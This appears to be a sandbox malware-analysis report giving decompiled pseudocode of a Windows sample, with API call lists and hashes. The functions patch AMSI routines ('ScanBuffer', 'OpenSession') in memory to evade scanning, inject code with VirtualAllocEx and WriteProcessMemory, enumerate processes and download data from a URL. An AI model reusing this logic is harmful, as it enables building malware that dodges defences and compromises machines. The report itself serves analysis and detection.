                                                                                                						_push( *0x2194598);
                                                                                                						_push("OpenSession");
                                                                                                						E02174C24();
                                                                                                						E02174A98( &_v292, E02174D64(_v296));
                                                                                                						_push(_v292);
                                                                                                						E02174BB0( &_v304,  *0x2194598, 0x2188438);
                                                                                                						E02174A98( &_v300, E02174D64(_v304));
                                                                                                						_pop(_t720); // executed
                                                                                                						E02183690(_v300, 0x2194598, _t720, 0x2194520); // executed
                                                                                                						_push(0x2188438);
                                                                                                						_push( *0x2194598);
                                                                                                						_push("ScanBuffer");
                                                                                                						E02174C24();
                                                                                                						E02174A98( &_v308, E02174D64(_v312));
                                                                                                						_push(_v308);
                                                                                                						E02174BB0( &_v320,  *0x2194598, 0x2188438);
                                                                                                						E02174A98( &_v316, E02174D64(_v320));
                                                                                                						_pop(_t725); // executed
                                                                                                						E02183690(_v316, 0x2194598, _t725, 0x2194520); // executed
                                                                                                						E02174A98( &_v324, "kernel32");
                                                                                                						_t457 = E0217CAC8(_v324, 0x2194598, 0x8000); // executed
                                                                                                						 *0x21945ac = _t457;
                                                                                                						_t458 =  *0x21945ac; // 0x76670000
                                                                                                						 *0x21945a8 = GetProcAddress(_t458, "WriteProcessMemory");
                                                                                                						_t460 =  *0x21945ac; // 0x76670000
                                                                                                						FreeLibrary(_t460);
                                                                                                						_t462 =  *0x2194500; // 0x29000
                                                                                                						_t463 =  *0x21944fc; // 0x10410000
                                                                                                						WriteProcessMemory(_t775,  *0x2194520, _t463, _t462, 0x2194518); // executed
                                                                                                						_push(0x2188438);
                                                                                                						_push( *0x2194598);
                                                                                                						_push("OpenSession");
                                                                                                						E02174C24();
                                                                                                						E02174A98( &_v328, E02174D64(_v332));
                                                                                                						_push(_v328);
                                                                                                						E02174BB0( &_v340,  *0x2194598, 0x2188438);
                                                                                                						E02174A98( &_v336, E02174D64(_v340));
                                                                                                						_pop(_t732); // executed
                                                                                                						E02183690(_v336, 0x2194598, _t732, 0x2194520); // executed
                                                                                                						_push(0x2188438);
                                                                                                						_push( *0x2194598);
                                                                                                						_push("Initialize");
                                                                                                						E02174C24();
                                                                                                						E02174A98( &_v344, E02174D64(_v348));
                                                                                                						_push(_v344);
                                                                                                						E02174BB0( &_v356,  *0x2194598, 0x2188438);
                                                                                                						E02174A98( &_v352, E02174D64(_v356));
                                                                                                						_pop(_t737); // executed
                                                                                                						E02183690(_v352, 0x2194598, _t737, 0x2194520); // executed
                                                                                                						_push(0x2188438);
                                                                                                						_push( *0x2194598);
                                                                                                						_push("OpenSession");
                                                                                                						E02174C24();
                                                                                                						E02174A98( &_v360, E02174D64(_v364));
                                                                                                						_push(_v360);
                                                                                                						E02174BB0( &_v372,  *0x2194598, 0x2188438);
                                                                                                						E02174A98( &_v368, E02174D64(_v372));
                                                                                                						_pop(_t742); // executed
                                                                                                						E02183690(_v368, 0x2194598, _t742, 0x2194520); // executed
                                                                                                						_push(0x2188438);
                                                                                                						_push( *0x2194598);
                                                                                                						_push("ScanBuffer");
                                                                                                						E02174C24();
                                                                                                						E02174A98( &_v376, E02174D64(_v380));
                                                                                                						_push(_v376);
                                                                                                						E02174BB0( &_v388,  *0x2194598, 0x2188438);
                                                                                                						E02174A98( &_v384, E02174D64(_v388));
                                                                                                						_pop(_t747); // executed
                                                                                                						E02183690(_v384, 0x2194598, _t747, 0x2194520); // executed
                                                                                                						_push(0x2188438);
                                                                                                						_push( *0x2194598);
                                                                                                						_push("OpenSession");
                                                                                                						E02174C24();
                                                                                                						E02174A98( &_v392, E02174D64(_v396));
                                                                                                						_push(_v392);
                                                                                                						E02174BB0( &_v404,  *0x2194598, 0x2188438);
                                                                                                						E02174A98( &_v400, E02174D64(_v404));
                                                                                                						_pop(_t752); // executed
                                                                                                						E02183690(_v400, 0x2194598, _t752, 0x2194520); // executed
                                                                                                						E02185B0C(_t775, 0x2194510, E02187774, 0, 8);
                                                                                                						_t538 =  *0x2194518; // 0x71
                                                                                                						_t539 =  *0x2194500; // 0x29000
                                                                                                						NtProtectVirtualMemory(_t775,  *0x2194520, _t539, 1, _t538);
                                                                                                					}
                                                                                                					_pop(_t697);
                                                                                                					 *[fs:eax] = _t697;
                                                                                                					_push(E02188408);
                                                                                                					E021748C4( &_v404, 0x29);
                                                                                                					_t699 =  *0x2185930; // 0x2185934
                                                                                                					E02175398( &_v240, _t699);
                                                                                                					return E021748C4( &_v220, 0x35);
                                                                                                				} else {
                                                                                                					 *_t215 = _t215 +  *_t215;
                                                                                                					asm("invalid");
                                                                                                					asm("invalid");
                                                                                                					_t602 = _t215 +  *_t215;
                                                                                                					 *_t602 =  *_t602 + _t602;
                                                                                                					asm("outsb");
                                                                                                					 *_t602 =  *_t602 + _t602;
                                                                                                					asm("invalid");
                                                                                                					asm("invalid");
                                                                                                					_t603 = _t602 +  *_t602;
                                                                                                					 *_t603 =  *_t603 + _t603;
                                                                                                					if ( *_t603 >= 0) goto L2;
                                                                                                					asm("invalid");
                                                                                                					 *((intOrPtr*)(__ecx)) =  *((intOrPtr*)(__ecx)) + 1;
                                                                                                					 *_t603 =  *_t603 + _t603;
                                                                                                					 *__edi =  *__edi + __ecx;
                                                                                                					 *_t603 =  *_t603 + _t603;
                                                                                                					asm("invalid");
                                                                                                					asm("invalid");
                                                                                                					 *_t603 =  *_t603 + _t603;
                                                                                                					 *_t603 =  *_t603 + _t603;
                                                                                                					asm("outsb");
                                                                                                					 *_t603 =  *_t603 + _t603;
                                                                                                					_v117 = _v117 + __edx;
                                                                                                					_t604 = _v0;
                                                                                                					_v16 =  *_t604;
                                                                                                					_v12 =  *((intOrPtr*)(_t604 + 4));
                                                                                                					_v12(_v16, 1, 0, _t778, __ebx);
                                                                                                					return 0;
                                                                                                				}
                                                                                                			}
                                                                                                0x021881e9
                                                                                                0x02188201
                                                                                                0x0218820c
                                                                                                0x0218821a
                                                                                                0x02188232
                                                                                                0x0218823d
                                                                                                0x0218823e
                                                                                                0x02188243
                                                                                                0x02188248
                                                                                                0x0218824a
                                                                                                0x0218825a
                                                                                                0x02188272
                                                                                                0x0218827d
                                                                                                0x0218828b
                                                                                                0x021882a3
                                                                                                0x021882ae
                                                                                                0x021882af
                                                                                                0x021882b4
                                                                                                0x021882b9
                                                                                                0x021882bb
                                                                                                0x021882cb
                                                                                                0x021882e3
                                                                                                0x021882ee
                                                                                                0x021882fc
                                                                                                0x02188314
                                                                                                0x0218831f
                                                                                                0x02188320
                                                                                                0x02188325
                                                                                                0x0218832a
                                                                                                0x0218832c
                                                                                                0x0218833c
                                                                                                0x02188354
                                                                                                0x0218835f
                                                                                                0x0218836d
                                                                                                0x02188385
                                                                                                0x02188390
                                                                                                0x02188391
                                                                                                0x021883a6
                                                                                                0x021883ab
                                                                                                0x021883b3
                                                                                                0x021883bd
                                                                                                0x021883bd
                                                                                                0x021883c4
                                                                                                0x021883c7
                                                                                                0x021883ca
                                                                                                0x021883da
                                                                                                0x021883e5
                                                                                                0x021883eb
                                                                                                0x02188400
                                                                                                0x02187742
                                                                                                0x02187742
                                                                                                0x02187744
                                                                                                0x02187746
                                                                                                0x02187748
                                                                                                0x0218774a
                                                                                                0x0218774c
                                                                                                0x0218774e
                                                                                                0x02187750
                                                                                                0x02187752
                                                                                                0x02187754
                                                                                                0x02187756
                                                                                                0x02187758
                                                                                                0x0218775d
                                                                                                0x0218775f
                                                                                                0x02187761
                                                                                                0x02187763
                                                                                                0x02187766
                                                                                                0x02187768
                                                                                                0x0218776a
                                                                                                0x0218776c
                                                                                                0x0218776e
                                                                                                0x02187770
                                                                                                0x02187771
                                                                                                0x02187773
                                                                                                0x0218777a
                                                                                                0x0218777f
                                                                                                0x02187785
                                                                                                0x02187790
                                                                                                0x02187796
                                                                                                0x02187796

                                                                                                APIs
                                                                                                • InetIsOffline.URL(00000000,00000000,02188401,?,?,?,?,00000000,00000000), ref: 021877DA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: InetOffline
                                                                                                • String ID: Initialize$OpenSession$ScanBuffer$UacScan$VirtualFree$WriteProcessMemory$kernel32$teSe
                                                                                                • API String ID: 3180263700-2541080484
                                                                                                • Opcode ID: 7013e894898c0a905de0ef324509098ca8ffedae55c359a501bcccde8c3d663d
                                                                                                • Instruction ID: e922b500becd202101c4cafd5e61f099ba0de0b64ef42928aa0669f9f7592a28
                                                                                                • Opcode Fuzzy Hash: 7013e894898c0a905de0ef324509098ca8ffedae55c359a501bcccde8c3d663d
                                                                                                • Instruction Fuzzy Hash: 7C62E035AC02189FEB21FB64DCC0FDEB3B6AF85700F5184A6A145AB214DB70AE45CF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                C-Code - Quality: 76%
                                                                                                			E0218368E(intOrPtr __eax, void* __ebx, char __edx, void* __esi) {
                                                                                                				intOrPtr _v8;
                                                                                                				char _v12;
                                                                                                				struct HINSTANCE__* _t16;
                                                                                                				struct HINSTANCE__* _t21;
                                                                                                				CHAR* _t24;
                                                                                                				struct HINSTANCE__* _t25;
                                                                                                				struct _ERESOURCE_LITE _t28;
                                                                                                				intOrPtr _t37;
                                                                                                				CHAR* _t40;
                                                                                                				void* _t43;
                                                                                                
                                                                                                				_v12 = __edx;
                                                                                                				_v8 = __eax;
                                                                                                				E02174D54(_v8);
                                                                                                				E02174D54(_v12);
                                                                                                				_push(_t43);
                                                                                                				_push(0x2183766);
                                                                                                				_push( *[fs:eax]);
                                                                                                				 *[fs:eax] = _t43 + 0xfffffff8;
                                                                                                				_t40 = E02174D64(_v8);
                                                                                                				_t16 = LoadLibraryA(_t40); // executed
                                                                                                				if(_t16 != 0) {
                                                                                                					 *0x21942f8 = GetModuleHandleA(_t40);
                                                                                                					if( *0x21942f8 != 0) {
                                                                                                						0;
                                                                                                						_t24 = E02174D64(_v12);
                                                                                                						_t25 =  *0x21942f8; // 0x77090000
                                                                                                						 *0x21942fc = GetProcAddress(_t25, _t24);
                                                                                                						if( *0x21942fc != 0) {
                                                                                                						}
                                                                                                						RtlMoveMemory(0x21942fc, 0x2176a20, 4);
                                                                                                						_t28 = E0217304C(7);
                                                                                                						NtFlushVirtualMemory(GetCurrentProcess(), 0x21942fc, 4, _t28);
                                                                                                					}
                                                                                                					_t21 =  *0x21942f8; // 0x77090000
                                                                                                					FreeLibrary(_t21);
                                                                                                				}
                                                                                                				_pop(_t37);
                                                                                                				 *[fs:eax] = _t37;
                                                                                                				_push(E0218376D);
                                                                                                				return E021748C4( &_v12, 2);
                                                                                                			}














                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(00000000,00000000,02183766), ref: 021836CA
                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02183766), ref: 021836D4
                                                                                                • GetProcAddress.KERNEL32(77090000,00000000), ref: 021836FD
                                                                                                • RtlMoveMemory.N(021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 0218371E
                                                                                                • GetCurrentProcess.KERNEL32(021942FC,00000004,00000000,021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 02183735
                                                                                                • NtFlushVirtualMemory.N(00000000,021942FC,00000004,00000000,021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 0218373B
                                                                                                • FreeLibrary.KERNEL32(77090000,00000000,00000000,00000000,02183766), ref: 02183746
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryMemory$AddressCurrentFlushFreeHandleLoadModuleMoveProcProcessVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 1189176514-0
                                                                                                • Opcode ID: 00721fd1d4f37798326d1164655f49212d0917ef6945d54d2101c7f44d32bac2
                                                                                                • Instruction ID: d33a99b4aa1cc7e9bc50abc87d26944045ad28a30388389465be6d69d2598c29
                                                                                                • Opcode Fuzzy Hash: 00721fd1d4f37798326d1164655f49212d0917ef6945d54d2101c7f44d32bac2
                                                                                                • Instruction Fuzzy Hash: 11118EB0AC0604AEEB10FBA8D985A5EB7FDEB85B00F9508B4A460E3250DB349981CE54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                C-Code - Quality: 76%
                                                                                                			E02183690(intOrPtr __eax, void* __ebx, char __edx, void* __esi) {
                                                                                                				intOrPtr _v8;
                                                                                                				char _v12;
                                                                                                				struct HINSTANCE__* _t16;
                                                                                                				struct HINSTANCE__* _t21;
                                                                                                				CHAR* _t24;
                                                                                                				struct HINSTANCE__* _t25;
                                                                                                				struct _ERESOURCE_LITE _t28;
                                                                                                				intOrPtr _t37;
                                                                                                				CHAR* _t40;
                                                                                                				void* _t43;
                                                                                                
                                                                                                				_v12 = __edx;
                                                                                                				_v8 = __eax;
                                                                                                				E02174D54(_v8);
                                                                                                				E02174D54(_v12);
                                                                                                				_push(_t43);
                                                                                                				_push(0x2183766);
                                                                                                				_push( *[fs:eax]);
                                                                                                				 *[fs:eax] = _t43 + 0xfffffff8;
                                                                                                				_t40 = E02174D64(_v8);
                                                                                                				_t16 = LoadLibraryA(_t40); // executed
                                                                                                				if(_t16 != 0) {
                                                                                                					 *0x21942f8 = GetModuleHandleA(_t40);
                                                                                                					if( *0x21942f8 != 0) {
                                                                                                						0;
                                                                                                						_t24 = E02174D64(_v12);
                                                                                                						_t25 =  *0x21942f8; // 0x77090000
                                                                                                						 *0x21942fc = GetProcAddress(_t25, _t24);
                                                                                                						if( *0x21942fc != 0) {
                                                                                                						}
                                                                                                						RtlMoveMemory(0x21942fc, 0x2176a20, 4);
                                                                                                						_t28 = E0217304C(7);
                                                                                                						NtFlushVirtualMemory(GetCurrentProcess(), 0x21942fc, 4, _t28);
                                                                                                					}
                                                                                                					_t21 =  *0x21942f8; // 0x77090000
                                                                                                					FreeLibrary(_t21);
                                                                                                				}
                                                                                                				_pop(_t37);
                                                                                                				 *[fs:eax] = _t37;
                                                                                                				_push(E0218376D);
                                                                                                				return E021748C4( &_v12, 2);
                                                                                                			}













                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(00000000,00000000,02183766), ref: 021836CA
                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02183766), ref: 021836D4
                                                                                                • GetProcAddress.KERNEL32(77090000,00000000), ref: 021836FD
                                                                                                • RtlMoveMemory.N(021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 0218371E
                                                                                                • GetCurrentProcess.KERNEL32(021942FC,00000004,00000000,021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 02183735
                                                                                                • NtFlushVirtualMemory.N(00000000,021942FC,00000004,00000000,021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 0218373B
                                                                                                • FreeLibrary.KERNEL32(77090000,00000000,00000000,00000000,02183766), ref: 02183746
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryMemory$AddressCurrentFlushFreeHandleLoadModuleMoveProcProcessVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 1189176514-0
                                                                                                • Opcode ID: 92cb3cd448ff88a763736dbfc6c0c735f55e659dc6f6394fe175ce9cc4660d55
                                                                                                • Instruction ID: cb77fdb31bf453472d24bba1e1afbb7cc0208f90c1af4f17046e021e083dc536
                                                                                                • Opcode Fuzzy Hash: 92cb3cd448ff88a763736dbfc6c0c735f55e659dc6f6394fe175ce9cc4660d55
                                                                                                • Instruction Fuzzy Hash: 9C1190B0AC0604AEEB10FBA8D985E5EB7FDFB85B00F9508F4E060E3250DB349981CE54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                C-Code - Quality: 60%
                                                                                                			E02188CBC(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi, void* __eflags) {
                                                                                                				char _v8;
                                                                                                				void* _t14;
                                                                                                				char* _t20;
                                                                                                				void* _t21;
                                                                                                				void* _t22;
                                                                                                				void* _t24;
                                                                                                				void* _t27;
                                                                                                				void* _t34;
                                                                                                				void* _t37;
                                                                                                				long _t43;
                                                                                                				intOrPtr _t48;
                                                                                                				intOrPtr _t49;
                                                                                                				intOrPtr _t51;
                                                                                                				intOrPtr _t52;
                                                                                                				void* _t54;
                                                                                                				intOrPtr _t56;
                                                                                                				intOrPtr _t57;
                                                                                                
                                                                                                				_t56 = _t57;
                                                                                                				_push(0);
                                                                                                				_t37 = __edx;
                                                                                                				_t54 = __eax;
                                                                                                				_push(_t56);
                                                                                                				_push(0x2188df7);
                                                                                                				_push( *[fs:eax]);
                                                                                                				 *[fs:eax] = _t57;
                                                                                                				E021748A0(__edx);
                                                                                                				E0217304C(0x64);
                                                                                                				E02177C4C( &_v8);
                                                                                                				_t14 = InternetOpenA(E02174D64(_v8), 1, 0, 0, 0); // executed
                                                                                                				 *0x21945b0 = _t14;
                                                                                                				if( *0x21945b0 == 0) {
                                                                                                					__eflags = 0;
                                                                                                					_pop(_t48);
                                                                                                					 *[fs:eax] = _t48;
                                                                                                					_push(E02188DFE);
                                                                                                					return E021748A0( &_v8);
                                                                                                				} else {
                                                                                                					_push(_t56);
                                                                                                					_push(0x2188dda);
                                                                                                					_push( *[fs:eax]);
                                                                                                					 *[fs:eax] = _t57;
                                                                                                					_t20 = E02174D64(_t54);
                                                                                                					_t21 =  *0x21945b0; // 0xcc0004
                                                                                                					_t22 = InternetOpenUrlA(_t21, _t20, 0, 0, 0, 0); // executed
                                                                                                					 *0x21945b4 = _t22;
                                                                                                					if( *0x21945b4 == 0) {
                                                                                                						__eflags = 0;
                                                                                                						_pop(_t49);
                                                                                                						 *[fs:eax] = _t49;
                                                                                                						_push(0x2188de1);
                                                                                                						_t24 =  *0x21945b0; // 0xcc0004
                                                                                                						return InternetCloseHandle(_t24);
                                                                                                					} else {
                                                                                                						_push(_t56);
                                                                                                						_push(0x2188dba);
                                                                                                						_push( *[fs:eax]);
                                                                                                						 *[fs:eax] = _t57;
                                                                                                						do {
                                                                                                							_t27 =  *0x21945b4; // 0xcc000c
                                                                                                							InternetReadFile(_t27, 0x21945b8, 0x401, 0x21949bc); // executed
                                                                                                							_t43 =  *0x21949bc; // 0x0
                                                                                                							E02174990(0x2194b70, _t43, 0x21945b8, 0);
                                                                                                							_t51 =  *0x2194b70; // 0x0
                                                                                                							E02174B6C(_t37, _t51);
                                                                                                						} while ( *0x21949bc != 0);
                                                                                                						_pop(_t52);
                                                                                                						 *[fs:eax] = _t52;
                                                                                                						_push(0x2188dc1);
                                                                                                						_t34 =  *0x21945b4; // 0xcc000c
                                                                                                						return InternetCloseHandle(_t34);
                                                                                                					}
                                                                                                				}
                                                                                                			}




















                                                                                                APIs
                                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02188D00
                                                                                                • InternetOpenUrlA.WININET(00CC0004,00000000,00000000,00000000,00000000,00000000), ref: 02188D3B
                                                                                                • InternetReadFile.WININET(00CC000C,021945B8,00000401,021949BC), ref: 02188D71
                                                                                                • InternetCloseHandle.WININET(00CC000C), ref: 02188DB4
                                                                                                • InternetCloseHandle.WININET(00CC0004), ref: 02188DD4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                • String ID:
                                                                                                • API String ID: 3121278467-0
                                                                                                • Opcode ID: 8f4eb6201f44d7dbeb3d9d5cea762be6964d42a1e4f195fb1b1fe3c0f1fd9853
                                                                                                • Instruction ID: 01885ef94c2c693dee2d8d345ff2637200d48136a13b93734e56da5271fb7f01
                                                                                                • Opcode Fuzzy Hash: 8f4eb6201f44d7dbeb3d9d5cea762be6964d42a1e4f195fb1b1fe3c0f1fd9853
                                                                                                • Instruction Fuzzy Hash: 043169307C4344AFFB21AFA4EC52B1677FAE789B00F920865F501D6680E7B6AC118E54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E02185AD8(void* __eax, long __ecx, void* __edx) {
                                                                                                				void* _t2;
                                                                                                				void* _t5;
                                                                                                				void* _t8;
                                                                                                				long _t9;
                                                                                                				void* _t10;
                                                                                                
                                                                                                				_t9 = __ecx;
                                                                                                				_t10 = __edx;
                                                                                                				_t5 = __eax;
                                                                                                				_t2 = VirtualAllocEx(__eax, 0, __ecx, 0x3000, 0x40); // executed
                                                                                                				_t8 = _t2;
                                                                                                				WriteProcessMemory(_t5, _t8, _t10, _t9, 0x2194518); // executed
                                                                                                				return _t8;
                                                                                                			}








                                                                                                APIs
                                                                                                • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,02185B24), ref: 02185AED
                                                                                                • WriteProcessMemory.KERNEL32(?,00000000,?,?,02194518,?,00000000,?,00003000,00000040,?,?,?,?,02185B24), ref: 02185AFD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocMemoryProcessVirtualWrite
                                                                                                • String ID:
                                                                                                • API String ID: 645232735-0
                                                                                                • Opcode ID: e8f917549ecb17e5641522b2d64e6cd1780c37ce080391dd8b07f7b132c1a630
                                                                                                • Instruction ID: 3417015de3e602fc12fe51aa77fc597d73315881462e9a6d18da19696eb1f369
                                                                                                • Opcode Fuzzy Hash: e8f917549ecb17e5641522b2d64e6cd1780c37ce080391dd8b07f7b132c1a630
                                                                                                • Instruction Fuzzy Hash: 0DD0A7623C23683BF534207B2C45F676E9DCBC6BB2E1100327708E6181D9D1AC0080F8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E02185770(int __eax, int __edx) {
                                                                                                				void* _t4;
                                                                                                				int _t5;
                                                                                                
                                                                                                				_t5 = __eax;
                                                                                                				if(E021854F4() == 0) {
                                                                                                					return 0;
                                                                                                				} else {
                                                                                                					_t4 = CreateToolhelp32Snapshot(_t5, __edx); // executed
                                                                                                					return _t4;
                                                                                                				}
                                                                                                			}






                                                                                                APIs
                                                                                                  • Part of subcall function 021854F4: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0218577B,?,?,0218580D,00000000,021858E9), ref: 02185508
                                                                                                  • Part of subcall function 021854F4: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02185520
                                                                                                  • Part of subcall function 021854F4: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02185532
                                                                                                  • Part of subcall function 021854F4: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02185544
                                                                                                  • Part of subcall function 021854F4: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02185556
                                                                                                  • Part of subcall function 021854F4: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02185568
                                                                                                  • Part of subcall function 021854F4: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0218557A
                                                                                                  • Part of subcall function 021854F4: GetProcAddress.KERNEL32(00000000,Process32First), ref: 0218558C
                                                                                                  • Part of subcall function 021854F4: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0218559E
                                                                                                  • Part of subcall function 021854F4: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 021855B0
                                                                                                  • Part of subcall function 021854F4: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 021855C2
                                                                                                  • Part of subcall function 021854F4: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 021855D4
                                                                                                  • Part of subcall function 021854F4: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 021855E6
                                                                                                  • Part of subcall function 021854F4: GetProcAddress.KERNEL32(00000000,Module32First), ref: 021855F8
                                                                                                  • Part of subcall function 021854F4: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0218560A
                                                                                                  • Part of subcall function 021854F4: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0218561C
                                                                                                  • Part of subcall function 021854F4: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0218562E
                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02185781
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
                                                                                                • String ID:
                                                                                                • API String ID: 2242398760-0
                                                                                                • Opcode ID: 0abcb422dce6d9b1aa492d06f666234b4ba704d8e6d3688766503f79b61f3e96
                                                                                                • Instruction ID: 57e1ef44aefa75d278cd122430e805bbae97a0e1bd116876a39e29339d58bc61
                                                                                                • Opcode Fuzzy Hash: 0abcb422dce6d9b1aa492d06f666234b4ba704d8e6d3688766503f79b61f3e96
                                                                                                • Instruction Fuzzy Hash: 4FC080726411206BCB1075F83CC84C3478DDE491BB3450462B509E3102D7154C115990
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph (legend: Executed / Not Executed)

                                                                                                [Graph for function 0218634C not reproduced. Named API calls in the graph: InetIsOffline, VirtualAlloc, GetProcAddress, FreeLibrary, LoadLibraryA, VirtualProtect.]
                                                                                                C-Code - Quality: 39%
                                                                                                			E0218634C() {
                                                                                                				signed int _v8;
                                                                                                				intOrPtr _v12;
                                                                                                				intOrPtr _v117;
                                                                                                				intOrPtr* _t12;
                                                                                                				intOrPtr* _t13;
                                                                                                				void* _t14;
                                                                                                				signed int _t15;
                                                                                                				signed int _t19;
                                                                                                				void* _t21;
                                                                                                				void* _t22;
                                                                                                				intOrPtr _t23;
                                                                                                				void* _t28;
                                                                                                				void* _t29;
                                                                                                				signed int _t32;
                                                                                                				intOrPtr _t33;
                                                                                                				intOrPtr _t34;
                                                                                                				void* _t36;
                                                                                                
                                                                                                				_t13 = _t12 +  *_t12;
                                                                                                				 *_t13 =  *_t13 + _t13;
                                                                                                				if( *_t13 >= 0) {
                                                                                                					L8:
                                                                                                					 *(_t13 + 0x270e) =  *(_t13 + 0x270e) & 0x02194598;
                                                                                                					_t14 = E0217304C(_t13);
                                                                                                					_push(_t14);
                                                                                                					L021858FC();
                                                                                                					if(_t14 == 0) {
                                                                                                						_t15 = 0x2194598;
                                                                                                						L11:
                                                                                                						asm("sbb [edx], al");
                                                                                                						E021748F4(_t15, 0x21876b8);
                                                                                                						L12:
                                                                                                						L13:
                                                                                                						_push(0x21876c4);
                                                                                                					}
                                                                                                					L9:
                                                                                                					E021748F4(0x2194598, 0x21876a8);
                                                                                                					goto L13;
                                                                                                				}
                                                                                                				 *_t13 =  *_t13 + _t13;
                                                                                                				asm("invalid");
                                                                                                				asm("invalid");
                                                                                                				_t19 = _t13 +  *_t13;
                                                                                                				 *_t19 =  *_t19 + _t19;
                                                                                                				_t22 = _t21 + 1;
                                                                                                				asm("insd");
                                                                                                				 *_t19 =  *_t19 + _t19;
                                                                                                				asm("invalid");
                                                                                                				asm("invalid");
                                                                                                				_t15 = _t19 |  *_t19;
                                                                                                				 *_t15 =  *_t15 + _t15;
                                                                                                				_t29 = _t28 - 1;
